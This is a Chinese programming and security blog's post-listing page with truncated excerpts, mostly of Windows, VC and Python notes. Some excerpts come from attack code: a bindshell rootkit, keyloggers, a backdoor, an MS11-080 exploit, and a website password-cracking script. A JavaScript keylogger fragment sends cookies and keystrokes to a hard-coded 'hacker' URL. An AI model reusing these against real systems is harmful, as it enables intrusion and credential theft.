- 博客(394)
- 资源 (22)
- 收藏
- 关注
转载 一个bindshell的代码
/* * Win32 RootKit - cmd.exe remote shell backdoor * (c) 2003 Christophe Devine * Distributed for educational purposes only! * * Before running ntbindshell.exe, rename it to * "rsmss.exe" and c
2012-02-05 16:48:06 1131
转载 演示还原NT平台上拨号连接的密码
-=-=-=-=-=-=-=-=-=-= x_dialupass.c -=-=-=-=-=-=-=-=-=-=/*演示还原NT平台上拨号连接的密码可运行于windows 2000/xp/2003原理基于分析dialupass v2.42eyas at xfocus.orghttp://www.xfocus.net2004-10-01FileName: x_dialupas
2012-02-05 16:45:33 889
转载 无钩子的键盘记录例子 神人 WinEggDrop作品
//**********************************************************************// Version: V1.0// Coder: WinEggDrop// Date Release: NULL// Purpose: Hookless Keylogger// Test PlatForm: Win 2K Pro And Ser
2012-02-05 16:40:35 1520
转载 古老的代码,但是绝对实用 一个小后门 WinEggDrop
//**********************************************************************// Version: V1.0// Coder: WinEggDrop// Date Release: NULL// Purpose: To Demonstrate Some Portless Backdoor Technique// Test
2012-02-05 16:39:11 2164
转载 编写一个初级的Windows调试器
编写一个初级的Windows调试器By Ajay Vijayvargiya | 24 Jan 2011作者:Ajay Vijayvargiya | 2011-01-24原文:http://www.codeproject.com/KB/system/writing_debugger_1.aspxPreamble前言All of us have used some
2012-02-05 11:57:27 1330
转载 js 键盘记录代码
var keys=''; //储存键盘鼠标记录var hacker = 'http://1.1.1.1:8080/xss.php';var Url = window.location;var Domain = document.domain;var Cookie = document.cookie; document.onkeypress = function(e) { /
2012-02-04 23:18:33 1464
转载 MS11-080 Exploit 本地溢出
#include #include #include #include #pragma comment(lib,"netapi32")#pragma comment (lib, "ws2_32.lib")USER_INFO_1 ui;DWORD dwError = 0;typedef struct _RTL_PROCESS_MODULE_INFORMATION {HANDLE S
2012-02-04 23:16:22 1587
转载 native app开发小结
Native app 程序开发 By microDebug程序类型关于程序级别的分类,大概可以分为三层:应用层程序,即普通的APP程序;Native App程序,如常见的chkdsk工具,PQ分区工具等,都属于这类,它是在win子系统未启动起来就执行的程序,执行环境比较纯净,只能调用ntdll.dll导出的函数;Driver 内核驱动程序,因功能不同也分为若干
2012-02-04 19:11:23 1548
翻译 ctypes 使用方法与说明
1, 首先确定你的python支持不支持ctypes python2.7以后ctypes已经是标配了,2.4以后的版本得自己装下ctypes2,加载动态库 两种加载方式 >>> from ctypes import * >>> libc = cdll . LoadLibrary ( "libc.so.6" ) >>> lib
2012-02-04 02:09:46 3064
原创 Fuzzing tools 下载
<!----><!--@font-face {font-family:宋体}@font-face {font-family:"\@宋体"}p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0cm; margin-bottom:.0001pt; text-align:justify; text-justi
2012-02-03 11:06:10 1560
转载 SQL SERVER数据库口令的脆弱性
SQL Server数据库口令的脆弱性 SQL Server数据库的口令脆弱体现两方面:1、网络登陆时候的口令加密算法 2、数据库存储的口令加密算法。本文对其分别进行了解析…… 跟踪了一下SQL Server数据库服务器的登录过程,发现口令计算是非常脆弱的,SQL Server数据库的口令脆弱体现两方面: 1、网络登陆时候的口令加密算法 2、数据库存储的口令加密算法
2012-02-02 10:17:48 708
原创 工作需要的网站用户密码破解
import pam,fileinputie=pam.PAMIE()def chk(uname,upass): ie ie.navigate('http://www.111111.org/index.php?module=authsystem&func=logout') ie.navigate('http://www.111111.org/index.php?mod
2012-01-30 19:53:44 1539
原创 工作时候自己写的一个用户采集python
import pamie=pam.PAMIE()def getname(a): fno=a.find('名字')+13 a=a[fno:fno+30] a=a[:a.find("<")] a=a.strip() if (a.startswith('class=co')): a=None return af=open("us
2012-01-30 19:52:39 1018
转载 mechanize 是 pthon 的并且可编程的 浏览器插件,
mechanize.Browser 和 mechanize.UserAgentBase 实现了 Urllib2.OpenerDirctor 的接口 可以打开包括http在内的所有 url 链接 mechanize.UserAgentBase 提供简单的客户端代理的动态配置功能,如:协议,cookie, 重定向,机器人限制, 而不需要每次都创建一个新的 OpenerDirector 对象 简单的表单
2012-01-30 10:54:07 1405
原创 51job自动更新简历python脚本
import pam,timeie=pam.PAMIE()ie.navigate("http://my.51job.com/my/My_SignIn.php")ie.setTextBox('username','12345')ie.setTextBox('userpwd','12345')ie.submitForm('signin')ie.clickLink('个人中心')ie.ex
2012-01-30 10:41:14 2940
原创 百合网站的模拟IE外挂
上次佳缘外挂走的是协议底层,因为有同事问题,所以这次的案例就直接 模拟IE了。代码如下:import pam,re,timeie=pam.PAMIE()ie.navigate("http://passport.baihe.com/login.jsp")ie.setTextBox('txtLoginEMail','00000@163.com')ie.setTextBox(
2012-01-30 00:11:18 1834
转载 三种想其他线程地址空间注入自己带吗
●Windows 钩子(Hooks)●CreateRemoteThread 和LoadLibrary 技术○进程间通讯●CreateRemoteThread 和 WriteProcessmemory 技术○如何使用该技术子类(SubClass)其他进程中的控件○什么情况下适合使用该技术●写在最后的话●附录●参考●文章历史导言:我们在Code projec
2012-01-28 20:42:52 848
转载 VC讲义大纲
另外,在实际的VC++教学中,发现很少有真正精通了C语言编程的学员,一般都有或多或少概念不是完全清楚的问题,特别是一些需要丰富的实战经验才能体会和明白的问题,如字符串,指针,类型转换,定义指向函数的指针类型,这也是导致学习VC++困难的一个原因。下面有几个简单测试将能发现你对C语言的掌握情况。int x=35;char str[10];//问:strlen(str)和sizeof(st
2012-01-28 20:31:08 3942
原创 activex 部分属性代码定义
一定记得还要修改总索引DEFINE_GUID(IID_IPropertyFrame, 0xB196B28A,0xBAB4,0x101A,0xB6,0x9C,0x00,0xAA,0x00,0x34,0x1D,0x07);//// Class IDs for property sheet implementations//DEFINE_GUID(CLSID_CFontPropPage,
2012-01-28 15:36:43 658
原创 CArchive 序列化,持久性
void CMfctempDlg::OnButton1() { // TODO: Add your control notification handler code here CFile file("1.txt",CFile::modeCreate|CFile::modeReadWrite ); CArchive ar(&file,CArchive::store); int i=4;
2012-01-28 15:30:59 580
原创 ANSI字符和UNICODE字符
在软件开发中,特别是使用C语言的一些有关字符串处理的函数,ANSI和UNICODE是区分是用的,那么ANSI类型的字符和UNICODE类型的字符如何定义,如何使用呢?ANSI和UNICODE又如何转换呢?一.定义部分:ANSI: char str[1024]; 可用字符串处理函数:strcpy( ), strcat( ), strlen( )等等。UNICODE:wchar_t s
2012-01-25 15:56:43 915
转载 分析了Windows下不同的动态内存分配方式
这里的"动态内存"包含以下两个方面的内容: 1.内存。这里的"内存"指的是进程的虚拟内存空间。在Win32环境下,每一个进程拥有独立的,大小为4G(0x0000 0000 ~ 0xFFFF FFFF)的虚拟内存空间。 2.动态。这里的"动态"指的是进程虚拟内存空间中的动态内存区域。在一个进程的虚拟内存空间中,只有动态内存可以在运行是被应用程序自由的分配/使用/释放。在Win32环境
2012-01-25 01:27:59 1941
转载 JMP ESP =>SEH(CALL EBX)
首先你要知道怎么利用JMP ESP的方式其利用格式是ORS,这里O=NOP,R=RET(jmp esp的地址),S=ShellCode。就是把缓冲区一直覆盖成NOP(空指令,什么都不做),直到原来的EIP位置时,JJMP ESP,紧跟后面才是我们的ShellCode。 这种方式执行到ShellCode的原理:正常情况下,函数返回时,RET,等于POP EIP,即回复原来PUSH的EIP
2012-01-23 01:41:01 1592
原创 函数调用栈
首先引入几个寄存器:EIP,EBP,ESP都是系统的寄存器,里面存的都是些地址。为什么要说这三个指针,是因为我们系统中栈的实现上离不开他们三个。我们DC上讲过栈的数据结构,主要有以下特点:后进先处。(这个强调过多)其实它还有以下两个作用:1.栈是用来存储临时变量,函数传递的中间结果。2.操作系统维护的,对于程序员是透明的。我们可能只强调了它的后进先出的特点,至于栈实
2012-01-22 01:24:09 1353
转载 关于typedef的用法总结
管实在C还是C++代码中,typedef这个词都不少见,当然出现频率较高的还是在C代码中。typedef与#define有些相似,但更多的是不同,特别是在一些复杂的用法上,就完全不同了,看了网上一些C/C++的学习者的博客,其中有一篇关于typedef的总结还是很不错,由于总结的很好,我就不加修改的引用过来了,以下是引用的内容(红色部分是我自己写的内容)。用途一:定义一种类型的别名
2012-01-21 01:38:09 653
原创 部分安全代码
// FPort.cpp : Defines the entry point for the console application.//#include "stdafx.h"BOOL GetProcessModule (DWORD dwPID, DWORD dwModuleID, � � � �LPMODULEENTRY32 lpMe32, DWORD cbMe32) { �
2012-01-20 11:59:57 2170
转载 枚举系统进程
在Windows 2000以上的MS操作系统,通过Windows的任务管理器可以列出当前系统的所有活动进程,在Windows XP中,更是在控制台下增加了一条Tasklist命令,让系统下的所有进程无所遁行。这一切是怎么实现的呢?方法一第一种方法是大家比较熟悉的通过ToolHelp Service提供的API函数来实现。这里用到了3个关键的函数:CreateToolhelp32Sn
2012-01-16 14:41:24 733
原创 LoadLibrary 和 GetModuleHandle
LoadLibrary是加载dll并增加引用计数,需要freelibrary释放。而GetModuleHandle是返回一个已经映射进调用进程地址空间的模块的句柄,不需要释放
2012-01-15 00:07:14 1472
转载 Python内建函数用法!
abs()dict()help()min()setattr()all()dir()hex()next()slice()any()divmod()id()object()sorted()ascii(
2012-01-10 22:37:13 2272
原创 python 3.2的数字字符转数字
除了 chr ord str 等内建函数之外还有躲在模块中的常用转换函数,典型的就是下面:>>> from locale import atoi>>> atoi('23123')23123>>>
2012-01-10 21:33:08 1103
转载 Windows消息大全
Windows消息大全 Windows是一消息(Message)驱动式系统,Windows消息提供了应用程序与应用程序之间、应用程序与Windows系统之间进行通讯的手段。应用程序要实现的功能由消息来触发,并靠对消息的响应和处理来完成。Windows系统中有两种消息队列,一种是系统消息队列,另一种是应用程序消息队列。计算机的所有输入设备由 Windows监控,当一个事件发生时,Win
2012-01-10 21:13:39 955
原创 vc 部分外挂相关代码,不断增加ing
转ASM代码@echo offf@cd /d "%~dp0"cl /c /FAs %1读取进程数据:HWND g=::FindWindow(NULL,gamename);DWORD a;::GetWindowThreadProcessId(g,(LPDWORD)&a);HANDLE ph=::OpenProcess(PROCESS_AL
2012-01-09 15:20:23 745
转载 MFC INI文件读写
INI文件是Windows系统中一类比较重要的文件,通常用来存放系统或者应用程序的配置信息,以方便系统或者应用 程序在初始化时再次读入。比如Windows系统中的配置文件win.ini和system.ini,它们就主要存放系统启动或用户登陆时的系统信息。这 项功能在方便了系统配置的同时,也为非法程序的自动运行提供了可乘之机。显然,这类文件的重要性应该引起我们的重视。但是对于这样的ini文件的读
2012-01-08 15:39:25 628
转载 Hash碰撞与拒绝服务攻击
文/玄魂1.Hash与Hash碰撞 Hash,简单来讲,是一种将任意长度的输入变换成固定长度的输出,固定长度的输出在“实际应用场景”下可以代表该输入。Hash函数通常被翻译成散列函数。Hash通常用来校验信息的一致性。Hash函数的实现多种多样,在安全领域应用最为广泛的是SHA-x系列和MDx系列。Hash函数也划分为带密钥的Hash函数和不带密钥的Hash函数
2012-01-07 11:39:11 1031
转载 [解析]Hash碰撞的拒绝式服务攻击
最近,除了国内明文密码的安全事件,还有一个事是比较大的,那就是Hash Collision DoS (Hash碰撞的拒绝式服务攻击),有恶意的人会通过这个安全弱点会让你的服务器运行巨慢无比。这个安全弱点利用了各语言的Hash算法的“非随机性”可以制造出N多的value不一样,但是key一样数据,然后让你的Hash表成为一张单向链表,而导致你的整个网站或是程序的运行性能以级数下降(可以很轻松的让你的
2012-01-07 11:36:20 1741
转载 新浪微博python下api的OAuth登陆
import webbrowserimport weibopyfrom weibopy.auth import OAuthHandlerfrom weibopy.api import APIclass myapp: def __init__(self,appkey='',appsecret=''): self.consumer_key=appkey
2012-01-07 03:43:45 979
原创 分析日志的一个python程序
#coding=utf-8# -*- coding: utf-8 -*-s=['eval']a=open(sys.argv[1],encoding='utf8')while True: try: txt=a.readline() for i in s: if txt.lower().find(i)>0:
2011-12-26 14:39:25 1213 1
转载 mysql 的日志的启动与查看
mysql有以下几种日志:错误日志: -log-err查询日志: -log慢查询日志: -log-slow-queries更新日志: -log-update二进制日志: -log-bin默 认情况下,所有日志创建于mysqld数据目录中。通过刷新日志,你可以强制 mysqld来关闭和重新打开日志文件(或者在某些情况下切换到一个新的日志)。当你执行一个FLUSH LOGS语句
2011-12-26 13:50:05 1970
原创 python utf编码(\u5029\u5973\u5e7d\u9b42)的奇怪问题与解决
直接这样敲打可以:>>>'\u5029\u5973\u5e7d\u9b42''倩女幽魂'但是作为程序就不行!因为是大多变转成原始字符了。于是自己写了一个函数完成转换!def txt(a): l=[] try: data=re.finditer(r'(\u.{4})',a) for i in data:
2011-12-15 19:34:58 2802
hydra 7.2 win32
2012-04-09
用Python做科学计算
2012-04-04
pyloris-3.2-win32
2012-03-17
类似IE的VC编写浏览器
2012-01-28
Using_XSS_to_bypass_CSRF_protection
2012-01-28
C语言难点及分析.
2012-01-28
向其他进程注入代码的三种方法
2012-01-28
网站安全漏洞的产生分析、处理总结
2011-04-21
VC学习大纲 VC学习讲义
2009-06-09
The Analysis Of Basic MFC Program Running Principle
2008-12-29
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人